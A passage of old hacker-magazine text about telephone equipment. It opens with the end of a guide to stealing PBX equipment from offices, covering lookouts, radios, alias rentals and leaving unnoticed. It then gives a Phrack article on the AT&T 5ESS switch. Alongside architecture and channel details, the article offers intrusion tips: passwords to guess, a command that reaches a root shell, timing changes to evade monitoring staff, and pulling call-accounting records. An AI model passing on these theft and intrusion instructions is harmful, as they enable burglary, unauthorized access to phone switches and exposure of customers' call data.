being a place to hide, sometimes you can find a bank of switches that
override the elevator's control panel (if for some reason you can't open
it or it's cardkey-controlled) and get to your floor that way.  Two
people with radios are needed to do this -- one in the equipment room,
one in the elevator.  Watch for high voltage and getting your coat
caught in a drive belt ...

Operation Integrity

     By taking advantage of daytime access, hiding places, and some of
the more sophisticated methods, there's no need to become an alarm
connoisseur or full-blown locksmith to liberate PBX equipment.  When
you can't avoid nighttime activity or an activated alarm system, then be
sure to take extra precautions.  Have lookouts, two-way radios, even a
police scanner.  Don't use CB radios, but rather HAM transceivers or
anything that operates on proprietary frequencies.  This will require a
small investment, but there's no price on your safety.
     Office buildings in downtown areas tend to be more secure than
those in the suburbs or outlying areas.  Location and surroundings are
important considerations when your operation takes place at night.  It
should also be noted that a building without a security guard (typically
the norm) may still subscribe to sporadic security checks where
rent-a-cops drive around the building at some regular interval.
     With regard to transportation and storage, rent vehicles and
facilities in alias names where appropriate.  Use taxis to pick you up
when you're departing with only a briefcase or single box of cards.  No
matter what the time may be, anyone seeing you enter a taxi in front of
the office will assume you're legit.
     It is our sincere wish that you apply this information to the
fullest extent in order to free yourself from becoming a mere tool of
capitalism, and use this freedom to pursue those things in life that
truly interest you.  We have tried to summarize and convey enough
basic information here to provide you with a complete underground
operation possibility.  All material in this file is based on actual
experience of the authors and their associates.

     For information on the sale of PBX or other telecommunications
equipment, or for any other inquiry, contact the Dark Side Research
group at the following Internet address :

               codec@cypher.com

***************************************************************************

--------------------------------------------------------------------------------


                            ==Phrack Magazine==

               Volume Four, Issue Forty-Three, File 16 of 27

                   % % % % % % % % % % % % % % % % % % %
                  % % % % % % % % % % % % % % % % % % % %
                 % %                                   % %
                  %            AT$T 5ESS(tm)            %
                 % %        From Top to Bottom         % %
                  %                                     %
                 % %                                   % %
                  %         by: Firm G.R.A.S.P.         %
                 % %                                   % %
                  % % % % % % % % % % % % % % % % % % % %
                   % % % % % % % % % % % % % % % % % % %


Introduction
~~~~~~~~~~~~

   Welcome to the world of the 5ESS.  In this file I will be covering
the switch topology, hardware, software, and how to program the switch.  I
am sure this file will make a few people pissed off <grin> over at BellCORE.
   Anyways, the 5ESS switch is the best (I think) all around switch. Far
better then an NT. NT has spent too much time with SONET and their S/DMS
TransportNode OC48.  Not enough time with ISDN, like AT$T has done. Not only
that, but DMS 100s are slow, slow, slow! Though I must hand it to NT, their
DMS-1 is far better then AT$T's SLC-96.



What is the 5ESS
~~~~~~~~~~~~~~~~

   The 5ESS is a switch. The first No. 5ESS in service was cut over in Seneca,
Illinois (815) in the early 1982.  This test ran into a few problem, but all
and all was a success.  The 5ESS is a digital switching system, this
advantage was realized in No. 4 ESS in 1976.  The 5ESS network is a TST
(Time Space Time) topology, the TSIs (Time Slot Interchangers) each
have their own processor, this makes the 5ESS one of the faster switches.
Though I hear some ATM switches are getting up there.




5ESS System Architecture & Hardware
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



                    5ESS SYSTEM ARCHITECTURE

                                               OSS Data Links

                                                  ^ ^    ^
                                                  | |    |
                                                  | |    |
                                            ......|.|....|......
                                            :     v v    v     :
                                            :   -------------  :
                                            :   |           |  :
                                            :   |   Input   |  :
               ...........................  :   |   Output  |====== TTY/CRT
-----------    :                         :  :   | Processor |  :
| Switch  |<===========                  :  :   -------------  :
| Module  |<========] |                  :  :           ^      ..............
-----------    :    v v                  :  :          |                    :
    o          :  =======   ----------   :  :          |       ------------ :
    o          :  | TMS |<->|Message |   :  :          |       |  Main    | :
    o          :  |     |<->|Switch  |<============    |       |  Store   | :
-----------    :  =======   ----------   :  :     |    |       -----.------ :
| Switch  |    :    ^ ^                  :  :     |    |            |       :
| Module  |<========= |                  :  :     v    v            |       :
-----------<===========                  :  :   --------------      |       :
               :.........................:  :   |  3B        |=======       :
                                            :   | Central    |              :
                                            :   | Control    |<=====> Disk! :
                                            :   --------------              :
                                            :                               :
                                            ................................:


                 COMMUNICATIONS MODULE            ADMINISTRATIVE MODULE





   The 5 ESS is a digital SPC switching system which utilizes distributed
control, a TST switching network and modular hardware and software design.

   The major components are:

ADMINISTRATIVE MODULE

    Two 3B20S Processors  (Which equal a 3B20D)

    - Central control and main storage
    - Disk storage for infrequently used programs and data, and main storage
      regeneration.
    - The two 3B20S processors are always comparing data, and when one fails
      the other acts in its place.

    Two Input/Output Processors (IOP)

    - Provides TTY and data-link interfaces to the 3B20D Processor, 5ESS
      Network, Master Control Center (MCC), and various Operational Support
      Systems (OSS). Here is a list of the defult TTY (also called
      "channels")


          tty     Channel Name

         ttyA     Master control console (MCC) terminal.
         ttyB     Master control console (MCC) terminal.
         ttyC     Traffic report printer
         ttyJ     supplementary trunk and line work station (STLWS) terminals
         ttyK     supplementary trunk and line work station (STLWS) terminals
         ttyL     supplementary trunk and line work station (STLWS) terminals
         ttyM     supplementary trunk and line work station (STLWS) terminals
         ttyN     supplementary trunk and line work station (STLWS) terminals
         ttyO     supplementary trunk and line work station (STLWS) terminals
         ttyP     Repair service bureau - Recent change and verify (RSB-RCV)
         ttyR     Office records printer
         ttyQ     Switching control center-recent change and verify (SCC-RCV)
                   terminals
         ttyR     Repair service bureau-automatic line insulation testing
                   (RSB-ALIT) terminal.
         ttyS     Switching control center-recent change and verify (SCC-RCV)
                   terminals
         ttyT     Switching control center-recent change and verify (SCC-RCV)
                   terminals
         ttyU     Belt line B
         ttyV     Local recent change and verify (RCV) terminal
         ttyW     Remote recent change and verify (RCV) terminal.
         ttyY     Network administration center (NAC) terminal.
         ttyZ     The switching control center (SCC) terminal.
         ttyi     SLC(R) carrier maintenance
         ttyj     STLWS - fifth of six
         ttyk     STLWS - sixth of six
         ttyl     STLWS - first of six
         ttym     STLWS - second of six
         ttyn     STLWS - third of six
         ttyo     STLWS - fourth of six
         ttyp     RCV/Repair Service Bureau
         ttyq     RCV/Network Administration Center
         ttyr     ALIT/Repair Service Bureau
         ttys     Maintenance
         ttyt     Maintenance
         ttyu     Belt line A
         ttyv     Local RC/V
         ttyw     Remote RC/V
         ttyx     Maintenance Control Center/Switching Control Center System
                  (MCC/SCCS)
         ttyy     Maintenance Control Center/Switching Control Center System
                  (MCC/SCCS)
         ttyz     Maintenance Control Center/Switching Control Center System
                  (MCC/SCCS)

         FILE     Destination file name in /rclog partition

         mt00     High-density tape device, rewind after I/O
         mt04     High-density tape device, does not rewind after I/O
         mt08     Low-density tape device, rewind after I/O
         mt0c     Low-density tape device, does not rewind after I/O
         mt18     Low-density tape device, rewind after I/O
         mt1c     Low-density tape device, does not rewind after I/O
         mttypc0  Special tape device, IOP 0, rewind after I/O
         mttypc1  Special tape device, IOP 1, rewind after I/O.



     Two Automatic Message Accounting (AMA) units

     - Uses data links to transport calling information to central revenue
       accounting office and AMA tape. Here is the basic structure AMA
       structure for the OSPS model.

         - Called customer's telephone number, either a
            seven- or ten-digit number
         - Calling customer's telephone number, seven digits
         - Date
         - Time of day
         - Duration of conversation.




COMMUNICATIONS MODULE

    Message Switch (MSGS)

    - Provides for control message transfer between the 3B20D Processor and
      Interface Modules (IM's)
    - Contains the clock for synchronizing the network.

    Time Multiplexed Switch (TMS)

    - Performs space division switching between SM's
    - Provides permanent time slot paths between each SM and the MSGS
      for control messages between the Processor and SM's (or between SM's)

    Switching Module (SM)

    - Terminates line and trunks
    - Performs time division switching
    - Contains a microprocessor which performs call processing function
      for the SM



                    5ESS - SWITCH MODULE

                                          --------------
                                          |            |
                                          |   SMPU     |
                                          |------------|
                       ---------          |            |
                       |       |   (64)   |            |
Analog Sub Lines <---->|  LU   |<-------->|            |
                       |-------|          |            |
                       |       |   (64)   |            |
Analog Trunk Lines <-->|  TU   |<-------->|            |   (256)
                       |-------|          |    TSIU    |<--------> NCT
                       |       |          |            |           Links
                       |       |   (128)  |     512    |           to
SLC-96 Remote <------->| DCLU  |<-------->|    Time    |<--------> TMS
                       |       |          |    Slots   |
                       |-------|          |            |
                       |       |          |            |
                       |       |          |            |
                       |       |          |            |
                       |       |   (256)  |            |
T1 Lines   <---------->| DLTU  |<-------->|            |
                       |       |          |            |
                       |       |          |            |
                       |       |          |------------|
                       ---------          |            |
                                          |    DSU     |
                                          --------------



COMMON COMPONENTS OF THE SWITCH MODULE (SM)

    Switch Module Processor Unit (SMPU)

    - Contains microprocessors which perform many of the call processing
      functions for trunks and links terminated on the SM.

    Time Slot Interchange Unit (TSIU)

    - 512 time slot capacity
    - Connects to the TMS over two 256-time slot Network Control and Timing
      (NCT) links.
    - Switches time slots from Interface Units to one of the NCT links (for
      intermodule calls).
    - Switches time slots from one Interface Unit to another within the SM
      (for intramodule calls).

    Digital Service Unit (DSU)

    - Local DSU provides high usage service circuits, such as tone decoders
      and generators, for lines and trunks terminated on the SM.
    - Global DSU provides low usage service circuits, such as 3-port
      conference circuits and the Transmission Test Facility, for all lines
      and trunks in the office (requires 64 time slots).

    The SM may be equipped with four types of Interface Units:

    Line Unit (LU)

    - For terminating analog lines.
    - Contains a solid-state two-stage analog concentrator that provides
      access to 64 output channels. The concentrator can be fully equipped to
      provide 8:1 concentration or can be fully equipped to provide 6:1 or 4:1
      concentration.
    - Each TU requires 64 time slots.

    Trunk Unit (TU)

    - For terminating analog trunks.
    - Each TU requires 64 time slots.

    Digital Line Trunk Unit (DLTU)

    - For terminating digital trunks and RSM's.
    - Each fully equipped DLTU requires 256 time slots.
    - A maximum of 10 DSls maybe terminated on one DLTU.

   The SM may be equipped with any combination of LU's, TU's, DCLU's and DLTU's
totaling 512 time slots.


5ESS System Software
~~~~~~~~~~~~~~~~~~~~

   The 5ESS is a UNIX based switch. UNIX has played a large part in
switching systems since 1973 when UNIX was use in the Switching Control Center
System (SCCS).  The first SCCS was a 16 bit microcomputer. The use of
UNIX for SCCS allowed development in C code, pseudo code, load test,
structure and thought. This led the development of the other switching systems
which AT$T produces today (such at System 75, 85, 1AESS AP, and 5ESS).
NOTE: You may hear SCCS called the "mini" sometimes
   The 5ESS's /etc/getty is not set up for the normal login that one would
expect to see on a UNIX System. This is due to the different channels that
the 5ESS has. The some channels are the TEST Channel, Maintenance Channel,
and RC Channel (which will be the point of focus). Once you are on one
channel you can not change the channel, as someone has said " it is
not a TV!" You are physically on the channel you are on.


Test Channel
~~~~~~~~~~~~

   The TEST channel is where one can test lines, and test the switch itself.
This is where operating support systems (such as LMOS) operate from.
This channel allows one to monitor lines via the number test trunk aka
adding a third trunk), voltage test and line seizure.
Here is a list of OSSs which access the test channels on the 5ESS.


 Group                    Operating Support Systems

 Special Service Center
                          SMAS via NO-Test
                          SARTS (IPS)
                          NO-TEST trunk (from the switch)
                          TIRKS
                          17B and 17E test boards (CCSA net using X-Bar)
                          RTS
                          BLV
                          POVT
                          DTAC
                          etc...

 Repair Service Bureau
                          #16LTD
                          #14LTD
                          LMOS (IPS)
                          MLT-2
                          ADTS
                          TIRKS
                          TFTP
                          TRCO
                          DAMT
                          ATICS
                          etc...


SCC Channel
~~~~~~~~~~~

   The SCC channel is where the SCC looks and watches the switch 24 hours a day,
seven days a week! From this channel one can input RC messages if necessary.
A lot of people have scanned these out, and though they were AMATs.  Well this
is in short, WRONG! Here is a sample buffering of what they are finding.

-----------------------------------------------------------------------------

   S570-67 92-12-21 16:16:48 086901 MDIIMON BOZOVILL DS0
A  REPT MDII WSN  SIGTYPE DP            TKGMN 779-16    SZ 21   OOS 0
     SUPRVSN RB  TIME 22:16:48  TEN=14-0-1-3-1  TRIAL 1 CARRFLAG NC     ID
     OGT  NORMAL  CALL  CALLED-NO       CALLING-NO      DISCARD 0

   S4C0-148963487 92-12-21 16:17:03 086902 MAIPR BOZOVILL DS0
   OP:CFGSTAT,SM=1&&192,OOS,NOPRINT; PF

   S570-67 92-12-21 16:17:13 086903 S0 BOZOVILL DS0
M  OP CFGSTAT SM 5 FIRST RECORD
     UNIT                       MTCE STATE       ACTIVITY  HDWCHK  DGN RESULT
     LUCHAN=5-0-0-3-4           OOS,AUTO,FE      BUSY      INH        CATP
     LUCHAN=5-0-0-2-5           OOS,AUTO,FE      BUSY      INH        ATP
     LUCHAN=5-0-0-0-3           OOS,AUTO,FE      BUSY      INH        ATP
     LUCHAN=5-0-0-3-5           OOS,AUTO,FE      BUSY      INH        ATP
     LUHLSC=5-0-0-1             OOS,AUTO,FE      BUSY      INH        ATP
     LUCHAN=5-0-0-0-2           OOS,AUTO,FE      BUSY      INH        CATP
     LUCHAN=5-0-0-3-6           OOS,AUTO,FE      BUSY      INH        ATP
     LUCHAN=5-0-0-1-4           OOS,AUTO,FE      BUSY      INH        ATP


   S570-983110 92-12-21 17:09:53 144471 TRCE WCDS0
A  TRC IPCT EVENT 2991
     DN 6102330000  DIALED    DN 6102220001
     TIME 17:09:52


------------------------------------------------------------------------------

  This has nothing to do with AMA, this is switch output on say the SCC
channel.  This is used by the SCCS for logging, and monitoring of alarms.
The whole point of this channel is to make sure the switch is doing what it
should do, and to log all activity on the switch. NOTHING MORE!
   To go into these messages and say what they are would take far too long,
order the OM manuals for the 5ESS, watch out, they are about 5 times the size of
the IM (input manual) set.  On average it takes someone three years of training
to be able to understand all this stuff, there is no way anyone can write a
little file in Phrack and hope all who read it understand everything about the
5ESS. RTFM!


RC Channel
~~~~~~~~~~

   The RC/V (Recent Change/Verify) Channel is where new features can be added or taken
away from phone lines. This is the main channel you may come in contact with,
if you come in contact with any at all. When one connects to a 5ESS RC/V channel
one may be dumped to a CRAFT
shell if the login has not been activated.  Access to the switch when the
login is active is controlled by lognames and passwords to restrict
unwanted entry to the system.  In addition, the SCC (Switching Control
Center) sets permission modes in the 5ESS switch which control the RC
(recent change) security function.
   The RC security function determines whether recent changes may be made
and what types of changes are allowed.  If a situation arises where the RC
security function denies the user access to recent change via RMAS or RC
channels, the SCC must be contacted so that the permission modes can be
modified.  (Hint Hint)
   The RC security function enables the operating telephone company
to decide which of its terminals are to be allowed access to which
set of RC abilities.  NOTE that all verify input messages are always
allowed and cannot be restricted, which does not help too much.
     The RC security data is not part of the ODD (office dependent data).
Instead, the RC security data is stored in relatively safe DMERT operating
system files which are only modifiable using the following message:

SET:RCACCESS,TTY="aaaaa",ACCESS=H'bbbbb;

where: aaaaa = Symbolic name of terminal in double quotes
          H' = Hexadecimal number indicator in MML
       bbbbb = 5-character hexadecimal field in 5E4 constructed
               from binary bits corresponding to RC ability.
               The field range in hexadecimal is from 00000 to
               FFFFF.

     This message must be entered for each type terminal (i.e.
               "aaaaa"="rmas1", "rmas2", etc., as noted above in
                TTY explanations).


NOTE: Order IM-5D000-01 (5ESS input manual) or OM-5D000-01 (5ESS output manual)
for more information on this and other messages from the CIC at 1-800-432-6600.
You have the money, they have the manuals, do not ask, just order.  I
think they take AMEX!

     When the message is typed in, a DMERT operating system file is created
for a particular terminal.  The content of these files, one for each terminal,
is a binary field with each bit position representing a unique set of RC
abilities.  Conversion of this hexadecimal field to binary is accomplished
by converting each hexadecimal character to its equivalent
4-bit binary string.

       ----------------------------------------------------------
       HEX   BINARY | HEX   BINARY | HEX   BINARY | HEX   BINARY
       -------------|--------------|--------------|--------------
        0     0000  |  4     0100  |  8     1000  |  C     1100
       -------------|--------------|--------------|--------------
        1     0001  |  5     0101  |  9     1001  |  D     1101
       -------------|--------------|--------------|--------------
        2     0010  |  6     0110  |  A     1010  |  E     1110
       -------------|--------------|--------------|--------------
        3     0011  |  7     0111  |  B     1011  |  F     1111
       ----------------------------------------------------------


Each bit position corresponds to a recent change functional area.
  A hexadecimal value of FFFFF indicates that all bit positions are
set to 1 indicating that a particular terminal has total RC access.  Also,
verify operations as well as lettered classes are not included in the
terminals security scheme since all terminals have access to verify views
and lettered classes.
  In addition, maintenance personnel are able to verify the security
code for any terminal by typing the following message from either
the MCC (Master Control Center) or SCCS (Switching Control Center System)
Mini terminal:

OP:RCACCESS,TTY="xxxxx";

where: xxxxx = symbolic name of terminal in double quotes.

Each bit position corresponds to a recent change functional area.

  To ensure redundancy, DMERT operating system files are backed up
immediately on disk by the SCC.
  The input message that defines the password and CLERK-ID (another name for
username) is in the Global RC feature.  This input message defines a clerk-id
and associated password or deletes an existing one. (Recall that CLERK-ID and
PASSWORD are required fields on the Global RC Schedule view 28.1 in
RCV:MENU:APPRC, but more on this later)

This new input message is as follows:

GRC:PASSWORD,CLERKID=xxxxxxxxxx,[PASSWD=xxxxxxxx|DELETE]

Note: CLERKID  can be from 1 to 10 alphanumeric characters and
      PASSWORD from 1 to 8 alphanumeric characters.

This input message can only be executed from the MCC or SCCS
terminals, and only one password is allowed per CLERK-ID.  To
change a clerk-id's password, this message is used with the same
CLERK-ID but with a different password.



Global RC Schedule View 28.1 from the RC/V Recent Change Menu System
----------------------------------------------------------------------------


                          5ESS SWITCH  WCDS0
                          RECENT CHANGE  28.1
                   GLOBAL RECENT CHANGE SCHEDULING

*1. GRC NAME   __________
*2. SECTION    _____
#3. CLERK ID   __________
#4. PASSWORD   ________
 5. MODE       _______
 6. RDATE      ______
 7. RTIME      ____
 8. SPLIT      _
 9. SPLIT SIZE _____
10. MAX ERRORS _____
11. VERBOSE    _



----------------------------------------------------------------------------

When the security is set up on the RC/V channel, one will see:


----------------------------------------------------------------------------

5ESS login

15       WCDS0                    5E6(1)                   ttsn-cdN TTYW

Account name:


----------------------------------------------------------------------------

There are no defaults, since the CLERK-ID and the password are set by craft,
but common password would be the name of the town, CLLI, MANAGER, SYSTEM,
5ESS, SCCS1, SCC, RCMAC, RCMAxx, etc,...
      If one sees just a " < "  prompt you are at the 'craft' shell
of the RC/V channel, the 5E login has not been set. The Craft shell is
running on the DMERT (which is a UNIX environment development operating system,
a System V hack). The Craft shell prompt is a "<".  From this shell one
will see several error messages.  Here is a list and what they mean:

     Error Message   Meaning

     ?A              Action field contains an error
     ?D              Data field contains an error
     ?E              Error exists in the message but can not be resolved to
                     the proper field (this is the "you have no idea" message)
     ?I              Identification field contains an error
     ?T              Time-out has occurred on channel
     ?W              Warning exists in input line



     Other output message meanings, from the RC/V craft menu.

     OK              Good
     PF              Printout follows
     RL              Retry later
     NG              No good, typically hardware failure
                     (ie: SM does not exist)
     IP              In progress
     NA              The message was not received by the backup control
                     process



  When inputing RC messages it is best to do it in the middle of the day
since RC messages are sent to each channel! The SCC is watching and if
there are RC messages running across at 3 in the morning, the SCC is going
to wonder what the hell RCMAC (Recent Change Memory Administration Center)
is doing at three in the morning!  However, one may be hidden by MARCH's
soaking, and the night shift at the SCC are overloaded and may miss
what is going on while correcting other major problems. So it is up to
you.


DMERT
~~~~~

    The DMERT (Duplex Multiple Environment Real Time) uses the Western
Electric (another name for AT$T!) 3B20D  Duplex processor (or 2 3B20S
Simplex processors).  The DMERT software totals nearly nine thousand
source files, one million lines of non-blank source code,
and was developed by approximately 200 programers. There are eight main
releases of this software, they are referred to as generics (like 5E4.1,
5E4.2,  to 5E8.1 also seen as 5E4(1), 5E4(2) to 5E8(1), this can be though
of as DOS version).  DMERT is similar to regular UNIX but can be best described
as a custom UNIX system based on the 3B20D, the DMERT OS can be ported to
PDP-11/70s or a large IBM Mainframe. The DMERT operating system is split both
logically and physically.  Physically, the software is evenly divided across
the five (there were seven Software Development systems all running a 3B20S
where the DMERT code was written) Software Development systems. Logical, the
software is divided into twenty-four different subsystems.  To access this
from the "craft" shell of the RC/V channel, type:

RCV:MENU:SH!

NOTE:
This will dump one to a root shell, from which VaxBuster's (Who knows nothing
about VAXen, always wondered about him) file on how to redirect a TTY may
come in useful.


Programing the 5ESS
~~~~~~~~~~~~~~~~~~~

When programing the 5ESS there are things one should know, the first is that
one has a lot of power (just keep 911 in mind,  it would be foolish to even
think of disrupting anyones service.  911 is there for a reason, it should STAY
that way).  And anything one does is logged, and can be watched from the
SCC.  Note that the night SCC crew is a lot more lax on how things are done
then the day shift, so it would be best to do this at night.  I could tell you
how to crash the switch in two seconds, but that is not the point here.
Destroying something is easy, anyone can do that, there is no point to it.
All that taking down a switch will do is get one into jail, and get sued if
someone needed 911 etc,... (I think SRI is wishing they had talked to me
now).


RC from Craft Shell on RC/V Channel
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    RC and VFY is complex from the craft shell on the RC/V channel.
This is called the input text option.  It is accessed by using the

RCV:APPTEXT:

    This gets a little complex to follow, but the best thing to do
is to order the Manual 235-118-215 Recent Change Procedures Text Interface
[5E4] it is $346.87, another good one to get is 235-118-242, for $413 even
and last, but the best is 235-118-243, this beast is only $1344.63 what a
deal. When calling the CIC they will transfer you to a rep. from your area.
Gets to be kind of a pain in the ass, but.. Anyways, back on track:



RCV:APPTEXT:DATA[,SUMMARY|,NSUMMARY][,VFYIMMED|,VFYEND][,VFYNMVAL|,VFYSCIMG]
           [,DEVICE={STDOUT|ROP|ROP0|FILE|TTYx}],FORM=...,DATA,FORM=...,END;


DATA     -  This is for more then one RC operation in the same command

FORM     -  The format that is to be used

SUMMARY  -  Turns on one line summaries on the read only printer (ROP) (DEFULT)
NSUMMARY -  Turns off one line summary logging by the ROP

VFYIMMED -  Prints out verifies (VFYs) immediately, does not wait for
            session end.
VFYEND   -  Prints out all VFYs at session end, this is the DEFULT.

VFYNMVAL -  Print verify output in name-value pair format, this must be
            directed into a file (see DEVICE).
VFYSCIMG -  Makes output into screen size image (DEFULT).

DEVICE   -  Redirect verify output to a device other than ones screen.

            ROP/ROP0   -  Send verify output to the ROP

            STDOUT     -  Send verify output to ones screen (DEFULT)

            TTYx       - Send verify output to any valid tty (such as
                         ttya and ttyv) that exists in "/dev."  You
                         must use the tty name, not tty number.
            FILE       - Send verify output to a file in "/rclog".  The
                         file will be prefixed with "RCTX", and the user
                         will be given the name of the file at the
                         beginning and end of the APPTEXT session.
END      -  END of message.



 If the parameter is not entered on the command line, it may be
entered after the APPTEXT process begins, but must be entered prior to the
first "FORM=" statement. Here is a example of a MML RCV:APPTEXT.

rcv:apptext:data,form=2v1&vfy,set="oe.entype"&lset="oe.len"&xxxxxxxx,pty=i,vfy!

  The 2V1 may look strange at first, it may help getting use to the basics
first. To just VFY telephone numbers, just do a:

RCV:APPTEXT:DATA,FORM=1V6-VFY,TN=5551212,VFY,END!

   Though I can not really explain this any more then I have just due to
time and space.  These input messages may look complex at first, but are
really simple, and much better then dealing with the menu system, but
you will need to learn RC yourself! No one can explain it to you.


Pulling AMA from the RC/V channel Craft Shell
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Pulling AMA up is done with one command. The command is:


OP:AMA:SESSION[,ST1|,ST2];

 This command will request a report of the current or most recent automatic
message accounting (AMA) tape. ST1 and ST2 are the data streams.



Pulling up out of Service Lines, Trunks or Trunk Groups
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

   One may want to pull up all the out of service lines, trunks, or
trunk groups for many reasons.  These reasons i will not go into, but
from which lines can be set up. The command to do this from the craft
shell is a PDS command, this command is with a 'ball bat' (a `` ! '').


   OP:LIST,LINES[,FULL][,PRINT][;[a][,b][,c][,d][,e]]!

   OP:LIST,TRUNKS[,FULL][,PRINT][;[a][,b][,c][,d][,e]]!

   OP:LIST,TG [,FULL][,PRINT][;[a][,b][,c][,d][,e]]!



FULL    -   All (primary and pending) are printed. Note FULL is not the
            default when inputing this command.

PRINT   -   Print to the ROP in the CO.  (Not a good idea)

a-e     -   This is port status to match against the subset of trunks, lines
            or trunk groups that are specified.  (This is required input
            for FULL)




The 5ESS RC/V Menu Shell
~~~~~~~~~~~~~~~~~~~~~~~~

To access this shell from the RC/V channel craft shell, type:

RCV:MENU:APPRC

at the `` < '' prompt.

To access the 5ESS RC/V menu system from the MCC, STLWS, and TLWS
channel/terminals, one uses what are called pokes.  The poke that
is used here to access the RC/V Menu system on the 5ESS is 196.

Type 196 at the `` CMD< '' prompt, and you are on the RC/V menu system
of the 5ESS switch. This will cause ``RC/V 196 STARTING'' and
``RC/V 196 COMPLETED'' to be printed out on the ROP.


Either way, this will toss you into a menu system. The main menu looks like
this:

------------------------------------------------------------------------------



                               5ESS SWITCH  WCDS0
                        RECENT CHANGE AND VERIFY CLASSES


H RCV HELP              9  DIGIT ANALYSIS          20 SM PACK & SUBPACK
A ADMINISTRATION        10 ROUTING & CHARGING      21 OSPS FEATURE DEFINITION
B BATCH INPUT PARMS     11 CUTOVER STATUS          22 ISDN -- EQUIPMENT
1 LINES                 12 BRCS FEATURE DEFINITION 23 ISDN
2 LINES -- OE           13 TRAFFIC MEASUREMENTS    24 APPLICATIONS PROCESSOR
3 LINES -- MLHG         14 LINE & TRUNK TEST       25 LARGE DATA MOVEMENT
4 LINES -- MISC.        15 COMMON NTWK INTERFACE   26 OSPS TOLL & ASSIST/ISP
5 TRUNKS17 CM MODULE                               27 OSPS TOLL & ASSIST
7 TRUNKS - MISC.        18 SM & REMOTE TERMINALS   28 GLOBAL RC - LINES
8 OFFICE MISC. & ALARMS 19 SM UNIT


Menu Commands:




------------------------------------------------------------------------------

  The help menus for the 5ESS switch are lame, but I though that it would
be good to show them to you just for the hell of it, because it does explain
a little about the switch.

------------------------------------------------------------------------------




                           SCREEN 1 OF 7  5ESS SWITCH
                             RECENT CHANGE VIEW H.1
                            COMMANDS FOR MENU PAGES

    H  - Explains commands for MENU or views. If you enter H again, then it
         will display next HELP page.
    H# - Select HELP page. (# - help page number)
    Q  - Quit Recent Change and Verify.
    R  - Change mode to RECENT CHANGE
    V  - Change mode to VERIFY
    <  - Go to CLASS MENU page.
    #  - If on CLASS MENU page Go to a VIEW MENU page #.
    #  - If on VIEW MENU page Go to a RECENT CHANGE or VERIFY VIEW #.
    #.# - Go to a RECENT CHANGE or VERIFY VIEW. (CLASS#.VIEW#)




              ---------------------------------------------------


                           SCREEN 2 OF 7  5ESS SWITCH
                             RECENT CHANGE VIEW H.1
                            COMMANDS FOR MENU PAGES

   #R  - Go to Recent Change view for read.
   #I  - Go to Recent Change view for insert.
   #D  - Go to Recent Change view for delete (only print Key fields).
   #DV - Go to Recent Change view for delete with verify (print all fields).
   #U  - Go to Recent Change view for update.
   #UI - Go to Recent Change view for update in insert mode (user can change
         each field sequentially without typing field number).
   #V  - Go to Verify view.
   #N  - Go to next menu page. Back to the 1st page if there's no next page.


                ------------------------------------------------


                           SCREEN 3 OF 7 5ESS SWITCH
                             RECENT CHANGE VIEW H.1
                               COMMANDS FOR BATCH

BMI - Delayed Activation Mode. Choose time or demand release (for time
      release add service information). Select view number for Recent Change.
BMD - Display Status of Delayed Activation Recent Changes.
BMR - Release a file of Recent Changes stored for Delayed Activation.
IM  - Immediate Release Mode.




                ________________________________________________


                           SCREEN 4 OF 7  5ESS SWITCH
                             RECENT CHANGE VIEW H.1
                               COMMANDS FOR VIEWS


     < - In first field: Leave this view and return to select view number.
     < - Not in first field: Return to first field.
     ^ - In first field: Select new operation for this view.
     ^ - Not in first field: Return to previous field.
     > or ; - Go to end of view or stop at next required field.
     * - Execute the operation or go to next required field.
     ? - Toggle help messages on and off.
     Q - Abort this view and start over.
     V - Validate input for errors or warnings.



                ________________________________________________


                           SCREEN 5 OF 7  5ESS SWITCH
                             RECENT CHANGE VIEW H.1
                               COMMANDS FOR VIEWS

   R - Review view from Data Base.
   I - Insert this view into Data Base.
   U - Update this view into Data Base.
   D - Delete this view from Data Base (only print Key fields).
   C - CHANGE: Change a field - All fields may be changed except key fields
       when in the update mode only.
   C - CHANGE-INSERT: Allowed in the review mode only - Allows you to review
   C - CHANGE-INSERT: Allowed in the review mode only - Allows you to review
       a view and then insert a new view with similar field. You must change
       the key fields to use this facility. You may change other fields as
       required by the new view.
   P - Print hard copy of screen image (must have RC/V printer attached).



                ________________________________________________



                           SCREEN 6 OF 7  5ESS SWITCH
                             RECENT CHANGE VIEW H.1
                               COMMANDS FOR VIEWS

             The following are used only on views containing LISTS.


           ` - Blank entire row.
           - Sets this field to its default value.
           : - Sets this row to its default value.
           [ - Go backward to previous row.
           ] - Go forward to next row.
           ; - Go to end of view or stop at next required field.
           # - Go to end of list and stop at next non-list field.
           { - Delete current row and move next row to current row.
           } - Move current row to next row and allow insert of row.
           = - Copy previous row to current row.
           * - Execute the operation or stop at next required field.




                ________________________________________________

                           SCREEN 7 OF 7 5ESS SWITCH
                             RECENT CHANGE VIEW H.1
                   COMMANDS FOR AUTOMATIC FORMS PRESENTATION

          If RC/V is in automatic forms presentation and "Q" or "q" is
        entered for the operation, the following commands are available.

     A - Abort form fields.  RC/V stays in the current form.
     B - Bypass form.  Go to next form using automatic forms presentation.
     C - Cancel automatic forms presentation.  The previous menu
         will be displayed.
     H - Display automatic forms presentation help messages.
     < - Bypass form.  Go to next form using automatic forms presentation.







______________________________________________________________________________



When accessing the databases, here is a list of database access selections:

   I (insert) - Insert new data
   R (review) - Review existing data
   U (update) - Update or change existing data
   D (delete) - Delete (remove) unwanted data from the data base
   V (verify) - Verify the data in the data base.

These are to be entered when one sees the prompt:

-----------------------------------------------------------------------------

Enter Database Operation
I=Insert R=Review U=Update D=Delete : _

------------------------------------------------------------------------------


When using the RC/V menu system of the 5ESS, you may go and just keep going into
sub-menus, and fall off the end of the Earth. Here are the navigational
commands that are used to move around the menu system. As seen from the
RC/V menu system help, you see "SCREEN X out of X."  This means that there are
so many screens to go and to move between the screens you use the `` < '' to
move back (toward main menu) and `` > '' to move to the last menu. I know it
is shown in the help menu, but it is not explained like it needs to be.



Batch Input
~~~~~~~~~~~

The Batch Input feature for the 5ESS switch allows recent changes (RC)
to be entered at any date and time when the RC update would be
performed.  This allows RC input to be entered quickly, and for a large
number of inputs. The large numbers of RC input can be released
quickly in  batch mode.  The RC input can then be entered at any time,
stored until needed, and then released for use by the system
whenever needed, at any specific date and/or time.
  First and second level error correction is done during batch input.
  There are several different modes of batch input. These are:

      BMI - batch mode input - TIMEREL and DEMAND
